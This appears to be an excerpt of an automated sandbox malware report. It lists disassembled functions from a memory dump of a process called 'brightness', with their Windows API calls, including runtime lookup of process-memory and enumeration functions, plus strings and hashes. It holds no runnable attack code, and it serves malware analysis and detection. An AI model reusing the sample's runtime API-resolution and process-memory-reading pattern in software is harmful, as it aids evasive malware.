                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3341692771-0
                                                                                                                                            • Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                                                                                            • Instruction ID: f124548cb86953ebe42fb1a6f326c7f0884f528b7e330d1f5ec626150b6af2ef
                                                                                                                                            • Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                                                                                            • Instruction Fuzzy Hash: 00A022ACA003030A8F0F232C00383EB20333FE0B023CAC0E800008A0008F3A8000AC38
                                                                                                                                            Function 027B15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,027B1A03,?,027B2000), ref: 027B15E2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: fb548551c2fdadd22f213b8b1beca4484fc99cd02b61a9b67fe246e72db1588d
                                                                                                                                            • Instruction ID: d1e4e78b2f592716d282d36b84e2a189d4abff01600864c31e6e6dcfb5fd2c57
                                                                                                                                            • Opcode Fuzzy Hash: fb548551c2fdadd22f213b8b1beca4484fc99cd02b61a9b67fe246e72db1588d
                                                                                                                                            • Instruction Fuzzy Hash: 65F037F4B413408FDB96CF7999943427AD2EB89348F60C679E709DB6C8EB71A4018B11
                                                                                                                                            Function 027B1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,027B2000), ref: 027B16A4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 6a83d2f535ad255c770d584a2250a8ee72c096628af8242fa3b4957a2000a4bd
                                                                                                                                            • Instruction ID: bd9b38015240adeeefd4ea77138002fd2aa1960871bfde4ed2d5bc22c77c5d45
                                                                                                                                            • Opcode Fuzzy Hash: 6a83d2f535ad255c770d584a2250a8ee72c096628af8242fa3b4957a2000a4bd
                                                                                                                                            • Instruction Fuzzy Hash: EAF024B6F007946BD7128F5AAC84783BBA8FF00314F040539FA0C97384CB70A8108B94
                                                                                                                                            Function 027B16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,027B1FE4), ref: 027B1704
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                            • Opcode ID: 2cc67f8cbef03cbb814f4752439739bdd64256798e05cbc2089d9704fb5a7b0e
                                                                                                                                            • Instruction ID: e56b5c5b6e5367d1e571c0479d99e1106df26b898ff6c0373d43e20453bcaf8a
                                                                                                                                            • Opcode Fuzzy Hash: 2cc67f8cbef03cbb814f4752439739bdd64256798e05cbc2089d9704fb5a7b0e
                                                                                                                                            • Instruction Fuzzy Hash: 50E0CD757003016FD7115B7D5D547937BDCEF48654F554475F609DB381D660E8108B60

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 027CA954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,027CABDB,?,?,027CAC6D,00000000,027CAD49), ref: 027CA968
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 027CA980
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 027CA992
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 027CA9A4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 027CA9B6
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 027CA9C8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 027CA9DA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 027CA9EC
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 027CA9FE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 027CAA10
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 027CAA22
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 027CAA34
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 027CAA46
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 027CAA58
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 027CAA6A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 027CAA7C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 027CAA8E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                            • API String ID: 667068680-597814768
                                                                                                                                            • Opcode ID: edc0102ff3d30ec3c1f36f218b6f325070ac8b6819a847ea622b209d23258a2c
                                                                                                                                            • Instruction ID: bafa3c0f54f42cfd3db23dcf2686a24690a23a6d5c3268466d93486ddf3da33b
                                                                                                                                            • Opcode Fuzzy Hash: edc0102ff3d30ec3c1f36f218b6f325070ac8b6819a847ea622b209d23258a2c
                                                                                                                                            • Instruction Fuzzy Hash: BD31A0F4E807349FEB42DFB4D8E9B963BADEB05705710096DA901CF288D67498508F95
                                                                                                                                            Function 027B58B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,027B7330,027B0000,027DE790), ref: 027B58D1
                                                                                                                                            • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 027B58E8
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,?), ref: 027B5918
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,027B7330,027B0000,027DE790), ref: 027B597C
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,027B7330,027B0000,027DE790), ref: 027B59B2
                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,027B7330,027B0000,027DE790), ref: 027B59C5
                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,027B7330,027B0000,027DE790), ref: 027B59D7
                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027B7330,027B0000,027DE790), ref: 027B59E3
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027B7330,027B0000), ref: 027B5A17
                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027B7330), ref: 027B5A23
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 027B5A45
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                            • API String ID: 3245196872-1565342463
                                                                                                                                            • Opcode ID: 4d756634a5b4bd55ebc7403eb9c4a9f93553ee924438ba30deb56eadb9d7bfdb
                                                                                                                                            • Instruction ID: 15d65cb8b53da5f66461d500d231776cbdb27817dcf71e829600d9932debd78e
                                                                                                                                            • Opcode Fuzzy Hash: 4d756634a5b4bd55ebc7403eb9c4a9f93553ee924438ba30deb56eadb9d7bfdb
                                                                                                                                            • Instruction Fuzzy Hash: 74416C72E00259AFDB12DBE8CC88BDEB7BEAF09350F8445A5A548E7241E7709B448F54
                                                                                                                                            Function 027B5B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027B5B94
                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027B5BA1
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027B5BA7
                                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027B5BD2
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027B5C19
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027B5C29
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027B5C51
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027B5C61
                                                                                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027B5C87
                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 027B5C97
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                            • API String ID: 1599918012-2375825460
                                                                                                                                            • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                            • Instruction ID: b9e58a86988728419bcfdeab2aefddac3eee837e6d715e7ecc035039eb715c39
                                                                                                                                            • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                                                                                            • Instruction Fuzzy Hash: B5315471E4021D6AEB27D6B8DC8AFDF77AE5F04380F8445E19608E6181EB749E848F90
                                                                                                                                            Function 027B7F52 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 027B7F75
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DiskFreeSpace
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1705453755-0
                                                                                                                                            • Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                                                            • Instruction ID: edbf046cdb29779be66355c0e61f98b0057e12aab3da59869b25154923526883
                                                                                                                                            • Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                                                                                                                                            • Instruction Fuzzy Hash: 061100B5E00209AF9B45DF99C8849EFF7F9EFC8304B14C569A504EB254E6319A01CBA0
                                                                                                                                            Function 027BA744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027BA762
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                            • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                                            • Instruction ID: 92baab37c7df6dd578e27dfbfdd8ad0c6066c36340c2ade5784a178149e923af
                                                                                                                                            • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                                                                                                                                            • Instruction Fuzzy Hash: 2FE0927570421417D313A5685CA8BE6725D9F58310F00416AA905C7341EDB09D404AE4
                                                                                                                                            Function 027BB70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetVersionExA.KERNEL32(?,027DD106,00000000,027DD11E), ref: 027BB71A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            • Opcode ID: 2aad498337ea0ffcba999efd60c958a7346bcb66dfebe431c6f1135047fdfb07
                                                                                                                                            • Instruction ID: 64e25915f0d76ceedfa5e14d53c7b6be518d012bfc39b8440a9429b10179735f
                                                                                                                                            • Opcode Fuzzy Hash: 2aad498337ea0ffcba999efd60c958a7346bcb66dfebe431c6f1135047fdfb07
                                                                                                                                            • Instruction Fuzzy Hash: 59F09D74A453029FD392DF28D544B5677F9FB88A24F008929EA98CA780E73498A48B52
                                                                                                                                            Function 027BA790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,027BBDF2,00000000,027BC00B,?,?,00000000,00000000), ref: 027BA7A3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                            • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                                            • Instruction ID: 0b81f60aa3012407bbffe4171bc1d6b1b364dbd89aa2c5327486172fe97127dc
                                                                                                                                            • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                                            • Instruction Fuzzy Hash: 0DD05EA630E2602AA322A15A2D94EBB5AFCCFC57A1F10403EF688C6200D2108C0696F1
                                                                                                                                            Function 027B918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: LocalTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 481472006-0
                                                                                                                                            • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                                                            • Instruction ID: 35ed9ebf8069a9ca55e3655398944425fadf9c5273a030f88c51d02bf16707e8
                                                                                                                                            • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                                                            • Instruction Fuzzy Hash: 37A01180808820028A823B280C032BA3088AC00A20FC80F80A8F8802E0EE2E022080E3
                                                                                                                                            Function 027B20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                            • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                            • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                            • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                            Function 027BD214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 027BD21D
                                                                                                                                              • Part of subcall function 027BD1E8: GetProcAddress.KERNEL32(00000000), ref: 027BD201
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
